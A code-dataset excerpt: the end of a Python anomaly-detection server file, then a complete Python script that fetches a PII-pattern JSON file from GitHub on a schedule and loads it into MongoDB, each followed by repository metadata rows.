if config.LOG_TIME: self.logs.logger.info(f"Prediction took {time.time()-startTime:.4f}s")
return self._checkPrediction(outputs, image[1])
except:
self.logs.logger.error("Something when wrong during predictions")
| p4z1/NN-anomaly-detection-system | centrala/netServer.py | netServer.py | py | 3,955 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "os.path.join",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "config.ROOT_DIRECTORY",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "config.MODEL_ROO... |
74339324514 | import os
import sys
import requests
from pymongo import MongoClient
from apscheduler.schedulers.blocking import BlockingScheduler
# For simplicity, we are hardcoding the GitHub URL here.
GITHUB_URL = "https://github.com/akto-api-security/pii-types/blob/master/general.json"
# We can also pass the GitHub URL as an environment variable or as a command line argument.
# GITHUB_URL = os.environ.get("GITHUB_URL") if os.environ.get("GITHUB_URL") else sys.argv[1] if len(sys.argv) > 1 else print("Please provide a GitHub URL.")
MONGO_URI = os.environ.get("MONGO_URI", "mongodb://localhost:27017")
MONGO_DB_NAME = os.environ.get("MONGO_DB_NAME", "pii_data")
MONGO_COLLECTION_NAME = os.environ.get("MONGO_COLLECTION_NAME", "patterns")
CRON_MINUTES = os.environ.get("CRON_MINUTES", 60)
client = MongoClient(MONGO_URI)
db = client[MONGO_DB_NAME]
collection = db[MONGO_COLLECTION_NAME]
def fetch_data(github_url: str):
"""
Fetches data from the given GitHub URL and updates the MongoDB collection.
"""
response = requests.get(github_url)
if response.ok:
data = response.json()
if isinstance(data, dict):
data = [data]
collection.delete_many({})
collection.insert_many(data)
print("Data fetched and updated in MongoDB.")
else:
print("Error fetching data from GitHub.")
def trigger(minutes=int(CRON_MINUTES), github_file_link=GITHUB_URL):
"""
Triggers the fetch_data function every given number of minutes (default: 60 minutes).
"""
scheduler = BlockingScheduler()
# For a single URL, you can use the following code:
scheduler.add_job(fetch_data, 'interval', minutes=minutes, args=[github_file_link])
# For multiple URLs, you can use the following code:
# GITHUB_URLS = ["https://raw.githubusercontent.com/rabilrbl/akto/master/patterns.json", "https://raw.githubusercontent.com/rabilrbl/akto2/master/patterns.json"]
# scheduler.add_job(fetch_data, 'interval', minutes=60, args=[GITHUB_URLS])
scheduler.start()
if __name__ == "__main__":
trigger()
| rabilrbl/Akto-Assessment | script.py | script.py | py | 2,073 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.environ.get",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.environ.get",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.